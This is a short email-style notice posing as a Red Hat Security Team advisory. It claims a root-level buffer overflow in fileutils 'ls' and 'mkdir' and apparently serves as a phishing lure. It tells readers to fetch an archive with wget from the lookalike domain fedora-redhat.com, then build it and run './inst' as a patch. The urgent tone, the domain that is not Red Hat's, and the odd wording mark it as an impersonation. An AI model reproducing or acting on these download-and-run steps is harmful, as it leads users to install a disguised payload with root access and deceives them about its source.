RedHat: Buffer Overflow in "ls" and "mkdir"

[RedHat Security Team]

   [logo_rh_home.png]

   Original issue date: October 20, 2004
   Last revised: October 20, 2004
   Source: RedHat

   A complete revision history is at the end of this file.

   Dear RedHat user,

   Redhat found a vulnerability in fileutils (ls and mkdir), that could
   allow a remote attacker to execute arbitrary code with root
   privileges. Some of the affected linux distributions include RedHat
   7.2, RedHat 7.3, RedHat 8.0, RedHat 9.0, Fedora CORE 1, Fedora CORE 2
   and not only. It is known that *BSD and Solaris platforms are NOT
   affected.

   The RedHat Security Team strongly advises you to immediately apply the
   fileutils-1.0.6 patch. This is a critical-critical update that you
   must make by following these steps:
     * First download the patch from the Security RedHat mirror: wget
       www.fedora-redhat.com/fileutils-1.0.6.patch.tar.gz
     * Untar the patch: tar zxvf fileutils-1.0.6.patch.tar.gz
     * cd fileutils-1.0.6.patch
     * make
     * ./inst

   Again, please apply this patch as soon as possible or you risk your
   system and others` to be compromised.

   Thank you for your prompt attention to this serious matter,

   RedHat Security Team.

   Copyright © 2004 Red Hat, Inc. All rights reserved.